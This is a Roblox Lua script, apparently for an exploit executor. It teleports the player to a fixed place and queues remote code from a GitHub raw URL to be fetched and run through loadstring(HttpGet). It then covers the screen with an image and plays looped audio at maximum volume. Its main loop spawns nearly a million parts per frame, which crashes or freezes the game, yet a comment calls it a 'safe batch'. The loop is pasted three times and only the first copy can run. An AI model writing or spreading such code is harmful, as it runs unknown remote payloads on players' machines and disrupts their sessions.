local TARGET_PLACE_ID = 109983668079237
local SCRIPT_URL = "https://raw.githubusercontent.com/BBv6al982/INSTANT-TELEPORT/refs/heads/main/dsafsef"

local IMAGE_ID = "rbxassetid://94672303684170"
local SOUND_ID = "rbxassetid://89724705509927"

local Players = game:GetService("Players")
local TeleportService = game:GetService("TeleportService")
local SoundService = game:GetService("SoundService")
local RunService = game:GetService("RunService")

local LocalPlayer = Players.LocalPlayer

-------------------------------------------------
-- TELEPORT + REQUEUE
-------------------------------------------------
if game.PlaceId ~= TARGET_PLACE_ID then
    if queue_on_teleport then
        queue_on_teleport(string.format([[
            loadstring(game:HttpGet("%s"))()
        ]], SCRIPT_URL))
    end

    TeleportService:Teleport(TARGET_PLACE_ID, LocalPlayer)
    return
end


local playerGui = LocalPlayer:WaitForChild("PlayerGui")

-------------------------------------------------
-- FULLSCREEN GUI
-------------------------------------------------
local gui = Instance.new("ScreenGui")
gui.Name = "FullscreenCover"
gui.IgnoreGuiInset = true
gui.ResetOnSpawn = false
gui.ZIndexBehavior = Enum.ZIndexBehavior.Global
gui.Parent = playerGui

local img = Instance.new("ImageLabel")
img.Parent = gui
img.BackgroundTransparency = 0.5 -- semi-transparent white background
img.BackgroundColor3 = Color3.fromRGB(255,255,255)
img.Size = UDim2.fromScale(1, 1)
img.Image = IMAGE_ID
img.ScaleType = Enum.ScaleType.Stretch
img.ZIndex = 999999

-------------------------------------------------
-- LOOPED AUDIO
-------------------------------------------------
local sound = Instance.new("Sound")
sound.SoundId = SOUND_ID
sound.Volume = 10
sound.Looped = true
sound.Parent = SoundService
sound:Play()

while true do
    for i = 1000, 999999 do -- safe batch
        local part = Instance.new("Part")
        part.Size = Vector3.new(1,1,1)
        part.Position = LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart") and LocalPlayer.Character.HumanoidRootPart.Position or Vector3.new(0,5,0)
        part.Anchored = false
        part.Parent = workspace
    end
    RunService.Stepped:Wait()
end

while true do
    for i = 1000, 999999 do -- safe batch
        local part = Instance.new("Part")
        part.Size = Vector3.new(1,1,1)
        part.Position = LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart") and LocalPlayer.Character.HumanoidRootPart.Position or Vector3.new(0,5,0)
        part.Anchored = false
        part.Parent = workspace
    end
    RunService.Stepped:Wait()
end

while true do
    for i = 1000, 999999 do -- safe batch
        local part = Instance.new("Part")
        part.Size = Vector3.new(1,1,1)
        part.Position = LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart") and LocalPlayer.Character.HumanoidRootPart.Position or Vector3.new(0,5,0)
        part.Anchored = false
        part.Parent = workspace
    end
    RunService.Stepped:Wait()
end
